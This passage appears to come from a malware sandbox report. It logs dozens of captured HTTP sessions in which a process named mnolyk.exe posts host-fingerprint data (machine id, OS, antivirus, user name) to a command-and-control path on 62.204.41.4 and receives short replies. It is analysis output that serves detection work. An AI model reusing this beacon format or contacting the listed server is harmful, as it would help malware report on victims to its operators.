                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      537 | 192.168.2.7 | 50265 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:22.792860985 CET | 997 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:22.857007980 CET | 997 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      538 | 192.168.2.7 | 50266 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:23.033535004 CET | 998 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:23.100374937 CET | 998 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      539 | 192.168.2.7 | 50267 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:23.274291992 CET | 999 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:23.339706898 CET | 999 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      54 | 192.168.2.7 | 49778 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:10.754395962 CET | 486 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:10.817142010 CET | 486 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      540 | 192.168.2.7 | 50268 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:23.521301031 CET | 1000 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:23.585572958 CET | 1000 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      541 | 192.168.2.7 | 50269 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:23.765845060 CET | 1001 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:23.828995943 CET | 1001 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      542 | 192.168.2.7 | 50270 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:23.999396086 CET | 1002 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:24.064944983 CET | 1002 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      543 | 192.168.2.7 | 50271 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:24.266112089 CET | 1003 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:24.329607010 CET | 1003 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      544 | 192.168.2.7 | 50272 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:24.734925032 CET | 1004 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:24.798865080 CET | 1004 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      545 | 192.168.2.7 | 50273 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:25.058834076 CET | 1005 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:25.124984980 CET | 1005 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      546 | 192.168.2.7 | 50274 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:25.337790966 CET | 1006 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:25.402496099 CET | 1006 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      547 | 192.168.2.7 | 50275 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:26.060580015 CET | 1007 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:26.127399921 CET | 1007 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      548 | 192.168.2.7 | 50276 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:26.300126076 CET | 1008 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:26.364619017 CET | 1008 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      549 | 192.168.2.7 | 50277 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:27.380412102 CET | 1009 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:27.446774960 CET | 1009 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      55 | 192.168.2.7 | 49779 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:10.997636080 CET | 487 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:11.064073086 CET | 493 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      550 | 192.168.2.7 | 50278 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:27.635525942 CET | 1010 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:27.701442957 CET | 1010 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      551 | 192.168.2.7 | 50279 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:27.884546995 CET | 1011 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:27.948548079 CET | 1011 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      552 | 192.168.2.7 | 50280 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:28.132356882 CET | 1012 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:28.198837042 CET | 1012 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      553 | 192.168.2.7 | 50281 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:28.378215075 CET | 1013 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
